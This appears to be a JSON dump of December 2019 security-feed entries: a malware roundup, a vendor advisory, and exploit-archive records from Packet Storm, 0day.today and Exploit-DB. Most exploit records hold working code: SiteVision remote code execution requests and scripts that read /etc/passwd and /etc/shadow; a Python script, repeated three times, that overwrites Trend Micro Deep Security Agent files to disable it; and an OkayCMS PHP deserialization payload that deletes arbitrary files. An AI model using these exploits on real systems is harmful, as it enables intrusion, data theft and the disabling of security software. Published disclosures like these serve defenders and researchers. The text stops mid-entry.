obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (217) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (110) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nSpecial Search Offer adware \\- (40) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (26) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (19) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2019-12-06T10:31:01", "published": "2019-12-06T10:31:01", "id": "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VB8_-mJ1xSE/threat-roundup-1129-1206.html", "type": "talosblog", "title": "Threat Roundup for November 29 to December 6", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-12-06T15:25:27", "bulletinFamily": "unix", "description": "This update provides a security and a stability fix.\n**Vulnerability id:** CVE-2019-15681, PSBM-99817\nlibVNCServer-0.9.10 contains a memory leak in VNC server code, which may allow an attacker to read stack memory.\n\n", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "VZA-2019-093", "href": "https://help.virtuozzo.com/s/article/VZA-2019-093", "title": "Important product security update: Virtuozzo 6.0 Update 12 Hotfix 49 (6.0.12-3754)", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2019-12-07T10:47:23", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155585", "href": "https://packetstormsecurity.com/files/155585/SiteVision-4.x-5.x-Remote-Code-Execution.html", "title": "SiteVision 4.x / 5.x Remote Code Execution", "type": "packetstorm", "sourceData": "`# SiteVision Remote Code Execution \n \nCVE-2019-12733 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12733 \nhttps://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/ \n \n \n## Summary \nAttackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account. \n \n \n## Vendor Description \nSiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision. \n \n \n## Affected Versions \nAll versions of SiteVision 4 until 4.5.6. \nAll versions of SiteVision 5 until 5.1.1. \nEarlier major versions are assumed to be vulnerable. \n \n \n## Technical Details \nThe SiteVision application does not sufficiently validate whether or not the current user is permitted to add or edit modules of the \"script\" type. This means that a low-privilege user such as an Editor (\"Redakt\u00f6r\") can inject a new script module, or edit an existing one, and leverage it to execute arbitrary code. \n \nThe access control flaw allowing users to inject non-authorized modules are described separately in CVE-2019-12734. \n \nWhile the scripts are written in JavaScript, the environment allows the developer to reach and import Java APIs. \n \nReproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5: \n \n1. Install SiteVision and either create or import a new site. \n2. Set up and create an Editor (\"Redakt\u00f6r\") user. \n3. Log on as the new low-privilege user. \n4. Create a new page and note how only basic modules are available. \n5. Insert a text module. \n6. Re-send the HTTP request generated in step #5, but change the value of portletType from \"text\" to \"script\". The following is the resulting request for our demo environment: \n \n``` \nPOST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1 \nHost: fast.furious \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en \nAccept-Encoding: gzip, deflate \nReferer: http://fast.furious/edit/4.549514a216b1c6180f41c3 \nContent-Type: application/json; charset=utf-8 \nX-CSRF-Token: [...] \nX-Requested-With: XMLHttpRequest \nContent-Length: 70 \nConnection: close \nCookie: [...] \n \n{\"portletType\":\"script\",\"relativeElement\":\"12.549514a216b1c6180f41d0\"} \n``` \n \n7. Issue the modified request to the application. \n8. Reload the current page and note how it now contains a script module. \n9. Edit the script module to contain the following JavaScript code: \n \n``` \nconst app = (() => { \n'use strict'; \n \nimportPackage(java.io); \nimportPackage(java.lang); \n \nconst init = () => { \nvar result = []; \n \nvar p = Runtime.getRuntime().exec(\"whoami\"); \nvar stdInput = new BufferedReader( new InputStreamReader( p.getInputStream() ) ); \nvar s; \nwhile (( s = stdInput.readLine()) != null) { \nresult.push(s); \n} \n \nreturn result; \n \n}; \n \nreturn { init: init }; \n})(); \n \nconst context = app.init(); \n``` \n \n9b. Following PoC can be used for reading files such as /etc/passwd or /etc/shadow: \n \n``` \nconst app = (() => { \n'use strict'; \n \nimportPackage(java.io); \nimportPackage(java.lang); \n \nconst init = () => { \nvar result = []; \nvar file = new File('/etc/passwd'); \nvar br = new BufferedReader(new FileReader(file)); \n \nvar st; \nwhile ((st = br.readLine()) != null) { \nresult.push(st); \n} \n \nreturn result; \n}; \n \nreturn { init: init }; \n})(); \n \nconst context = app.init(); \n``` \n \n10. Enter the following Velocity code: \n \n``` \n<hr> \n<h2> \nScript output: \n</h2> \n \n<h3> \nAs List: \n</h3> \n<ul> \n#foreach( $c in $context ) \n<li>$c</li> \n#end \n</ul> \n \n<h3> \nAs String: \n</h3> \n<pre>$context</pre> \n<hr> \n``` \n \n11. Under \"Other\" check \"Show in edit mode\". \n12. Press \"OK\". \n13. Note the script output, and how it contains the result of the system command. In the command example above, the result of whoami should be \"root\" if SiteVision 5 was installed using the vendor-provided RPM package. \n \n \n## Vulnerability Disclosure Timeline \n2019-06-03 - Disclosed to vendor \n2019-06-04 - Vendor confirms vulnerability \n2019-09-26 - Vendor issues patches \n2019-12-04 - Public disclosure \n \nOscar Hjelm \nCybercom Sweden \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155585/sitevision-exec.txt"}, {"lastseen": "2019-12-07T02:20:37", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155579", "href": "https://packetstormsecurity.com/files/155579/Trend-Micro-Deep-Security-Agent-11-Arbitrary-File-Overwrite.html", "title": "Trend Micro Deep Security Agent 11 Arbitrary File Overwrite", "type": "packetstorm", "sourceData": "`# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite \n# Exploit Author : Peter Lapp \n# Exploit Date: 2019-12-05 \n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html \n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716 \n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise. \n# CVE: 2019-15627 \n \n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec) \n \n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools ) \n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations) \n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \n \n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately. \n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file. \n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \n# are ripe for the writing that can then point to a malicious binary. \n \n# Usage: \n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \n# 2. Open a browser (preferrably IE) and start the script \n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript). \n# 4. Keep refreshing the page until you see the script create the target file overwritten. \n# \n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \n \n \nimport time \nimport os \nimport subprocess \nimport sys \nimport webbrowser \nfrom watchdog.observers import Observer \nfrom watchdog.events import FileSystemEventHandler \n \nclass Stage1_Handler(FileSystemEventHandler): \ndef __init__(self): \nself.filenames = [] \ndef on_created(self, event): \nfilename = os.path.basename(event.src_path) \nif filename in self.filenames: \nprint ('Starting symlink creation.') \nwatcher1.stop() \nsymlinkery(self.filenames) \nelse: \nself.filenames.append(filename) \nprint ('File %s created.') % filename \n \nclass Stage2_Handler(FileSystemEventHandler): \ndef on_any_event(self, event): \nif os.path.basename(event.src_path) == 'dsa_control.cmd': \nprint \"Target file overwritten/deleted. Cleaning up.\" \nsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True) \nsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True) \nos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"') \nos.system('rmdir /S /Q \"C:\\\\test\"') \nos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp') \nwatcher2.stop() \nsys.exit(0) \n \nclass Watcher(object): \ndef __init__(self, event_handler, path_to_watch): \nself.event_handler = event_handler \nself.path_to_watch = path_to_watch \nself.observer = Observer() \ndef run(self): \nself.observer.schedule(self.event_handler(), self.path_to_watch) \nself.observer.start() \ntry: \nwhile True: \ntime.sleep(1) \nexcept KeyboardInterrupt: \nself.observer.stop() \n \nself.observer.join() \ndef stop(self): \nself.observer.stop() \n \ndef symlinkery(filenames): \nprint \"Enter symlinkery\" \nfor filename in filenames: \nprint \"Creating symlink for %s\" % filename \ncmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename \nsubprocess.Popen(cmdname, shell=True) \nos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig') \nos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test') \nwatcher2.run() \nprint \"Watcher 2 started\" \n \ntry: \nos.mkdir('C:\\\\test') \nexcept: \npass \n \npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus' \npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\' \nwatcher1 = Watcher(Stage1_Handler,path1) \nwatcher2 = Watcher(Stage2_Handler,path2) \nswitcheroo = \"start cmd /c BaitAndSwitch.exe C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\" \nsubprocess.Popen(switcheroo, shell=True) \nwatcher1.run() \n`\n", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155579/trendmicrodsa11-fileoverwrite.txt"}, {"lastseen": "2019-12-07T10:47:23", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155584", "href": "https://packetstormsecurity.com/files/155584/SiteVision-4.x-5.x-Insufficient-Module-Access-Control.html", "title": "SiteVision 4.x / 5.x Insufficient Module Access Control", "type": "packetstorm", "sourceData": "`# SiteVision Insufficient Module Access Control \n \nCVE-2019-12734 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12734 \nhttps://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/ \n \n \n## Summary \nAttackers may inject non-authorised modules when editing pages using a low-privilege account, leading to impacts ranging from Cross-Site Scripting to Remote Code Execution. \n \n \n## Vendor Description \nSiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision. \n \n \n## Affected Versions \nAll versions of SiteVision 4 until 4.5.6. \nAll versions of SiteVision 5 until 5.1.1. \nEarlier major versions are assumed to be vulnerable. \n \n \n## Technical Details \nThis vulnerability allows remote code execution as described in CVE-2019-12733. \n \nModules are basic building blocks in SiteVision pages and templates; they can feature display content such as headings and paragraphs, social functions and commenting, raw HTML, or server-side scripts. \n \nThe SiteVision application does not sufficiently assert whether or not the current user is authorised to add a specific module type to the current page, allowing attackers with low-privilege to add hostile content. This can trivially be reproduced by adding a paragraph text module, and changing \"text\" to \"html\" (or any other type) in the outgoing HTTP request. The application does not check whether or not the user is authorised to add the requested module; it relies on the fact that the user interface does not expose a button for it. \n \nReproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5: \n \n1. Install SiteVision and either create or import a new site. \n2. Set up and create an Editor (\"Redakt\u00f6r\") user. \n3. Log on as the new low-privilege user. \n4. Create a new page and note how only basic modules are available. \n5. Insert a text module. \n6. Re-send the HTTP request generated in step #5, but change the value of portletType from \"text\" to \"html\". The following is the resulting request for our demo environment: \n \n``` \nPOST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1 \nHost: fast.furious \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en \nAccept-Encoding: gzip, deflate \nReferer: http://fast.furious/edit/4.549514a216b1c6180f41c3 \nContent-Type: application/json; charset=utf-8 \nX-CSRF-Token: [...] \nX-Requested-With: XMLHttpRequest \nContent-Length: 70 \nConnection: close \nCookie: [...] \n \n{\"portletType\":\"html\",\"relativeElement\":\"12.549514a216b1c6180f41d0\"} \n``` \n \n7. Edit the HTML module and inject any JavaScript payload such as `<script>alert(1)</script>`. \n8. Under \"Other\" check \"Show in edit mode\". \n9. Press \"OK\". \n10. Note the alert pop-up, indicating that the injected JavaScript was executed. \n \n \n## Vulnerability Disclosure Timeline \n2019-06-03 - Disclosed to vendor \n2019-06-04 - Vendor confirms vulnerability \n2019-09-26 - Vendor issues patches \n2019-12-04 - Public disclosure \n \nOscar Hjelm \nCybercom Sweden \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155584/sitevision-accesscontrol.txt"}, {"lastseen": "2019-12-07T02:20:37", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155580", "href": "https://packetstormsecurity.com/files/155580/Microsoft-Skype-For-Business-DNS-Query.html", "title": "Microsoft Skype For Business DNS Query", "type": "packetstorm", "sourceData": "`I. VULNERABILITY \n------------------------- \nMicrosoft Skype for Business External Service Interaction (DNS) \nLatest Version \n \nII. CVE REFERENCE \n------------------------- \nNot Assigned Yet \n \nIII. VENDOR \n------------------------- \nhttps://www.microsoft.com \n \nIV. TIMELINE \n------------------------- \n28/11/2019 Vulnerability discovered \n03/12/2019 Vendor contacted \n04/12/2019 Microsoft replay that \u201cWe determined that this behavior is \nconsidered to be by design.\u201d \n \nV. CREDIT \n------------------------- \nAlphan Yavas from Biznet Bilisim A.S. \n \nVI. DESCRIPTION \n------------------------- \nMicrosoft Skype for Business latest versions affected from external \nservice interaction(DNS) vulnerability. A remote attacker could force \nthe vulnerable server to send DNS request to any remote server \nattacker wants. \n \nVII. PROOF OF CONCEPT \n------------------------- \nAffected Component: \nPath(inurl): /Dialin/Conference.aspx \nParameter: Username \n \nLogin page of Skype for Business affected from external service \ninteraction (DNS) vulnerability. If username is being sent with \nfollowing format victim server will send out DNS queries to xxx \ndomain. (xxx is the domain which you want to send request from \nserver) \n \nusername: ssrf.xxx.com\\pentest \npassword: (doesn't matter) \n \nReference: https://portswigger.net/kb/issues/00300200_external-service-interaction-dns \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155580/msskype-forgeddns.txt"}, {"lastseen": "2019-12-07T10:47:23", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155583", "href": "https://packetstormsecurity.com/files/155583/OkayCMS-2.3.4-Remote-Code-Execution.html", "title": "OkayCMS 2.3.4 Remote Code Execution", "type": "packetstorm", "sourceData": "`# Unauthenticated remote code execution in OkayCMS \n \n## Overview \n* Identifier: AIT-SA-20191129-01 \n* Target: OkayCMS \n* Vendor: OkayCMS \n* Version: all versions including 2.3.4 \n* CVE: CVE-2019-16885 \n* Accessibility: Local \n* Severity: Critical \n* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology) \n \n## Summary \n[OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com) \n \n## Vulnerability Description \nAn unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in \"view/ProductsView.php\" using the cookie \"price_filter\" or in \"api/Comparison.php\" via the cookie \"comparison\". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in \"api/Comparison.php\": \n \n``` \n$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array(); \n``` \n \nThe unsafe deserialization also occurs in \"view/ProductsView.php\": \n \n``` \n$price_filter = unserialize($_COOKIE['price_filter']); \n``` \n \n \n## Proof of Concept \nThe following code utilizes an object of the smarty-component to delete arbitrary files from the webhost: \n \n``` \n<?php \n \nif($argc != 3) \n{ \nprint \"usage: $argv[0] <url> <file>\\n\"; \nexit(1); \n} \n \n$url = $argv[1]; \n$file = $argv[2]; \n \nclass Smarty_Internal_CacheResource_File { \n \npublic function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) { \n$cached->is_locked = false; \n@unlink($cached->lock_id); \n} \n} \n \nclass Smarty_Template_Cached { \npublic $handler = null; \npublic $is_locked = true; \npublic $lock_id = \"\"; \n \npublic function __construct() { \n$this->lock_id = $GLOBALS['file']; \n$this->handler = new Smarty_Internal_CacheResource_File; \n} \n} \n \n \nclass Smarty { \npublic $cache_locking = true; \n} \n \nclass Smarty_Internal_Template { \npublic $smarty = null; \npublic $cached = null; \n \npublic function __construct() { \n$this->smarty = new Smarty; \n$this->cached = new Smarty_Template_Cached; \n} \n \npublic function __destruct(){ \nif ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) { \n$this->cached->handler->releaseLock($this->smarty, $this->cached); \n} \n} \n} \n \n$obj = new Smarty_Internal_Template(); \n \n$serialized = serialize($obj); \n \n$un = unserialize($serialized); \n \n$headers = [ \n'Accept-Language: en-US,en;q=0.5', \n\"Referer: $url/en/catalog/myagkie-igrushki\", \n'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';' \n]; \n \n$curl = curl_init(); \ncurl_setopt_array($curl, [ \nCURLOPT_HTTPHEADER => $headers, \nCURLOPT_RETURNTRANSFER => true, \nCURLOPT_URL => \"$url/en/catalog/myagkie-igrushki/sort-price\", \nCURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' \n]); \n$resp = curl_exec($curl); \nif(curl_error($curl)) { \nprint curl_error($curl); \n} \ncurl_close($curl); \n \n \nprint $resp; \n \n?> \n``` \n \n## Notes \nBecause of the high severity of this vulnerability we will not release a full exploit for the remote code execution. \n \n## Vulnerable Versions \nversions of the \u0093Lite\u0094-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too. \n \n## Tested Versions \nOkayCMS-Lite 2.3.4 \n \n## Impact \nAn unauthenticated attacker could upload a webshell to the server and execute commands remotely. \n \n## Mitigation \nAt the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended. \n \n## References: \n* https://nvd.nist.gov/vuln/detail/CVE-2019-16885 \n \n## Vendor Contact Timeline \n \n* `2019-08-29` Contacting the vendor \n* `2019-09-04` Vendor replied \n* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix \n* `2019-09-29` Public disclosure \n \n## Advisory URL \n[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms) \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155583/AIT-SA-20191129-01.txt"}], "zdt": [{"lastseen": "2019-12-06T16:00:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33630", "href": "https://0day.today/exploit/description/33630", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Exploit", "type": "zdt", "sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a browser (preferrably IE) and start the script\r\n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" % filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33630"}], "exploitdb": [{"lastseen": "2019-12-06T08:26:49", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "EDB-ID:47751", "href": "https://www.exploit-db.com/exploits/47751", "type": "exploitdb", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite", "sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Exploit Date: 2019-12-05\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a 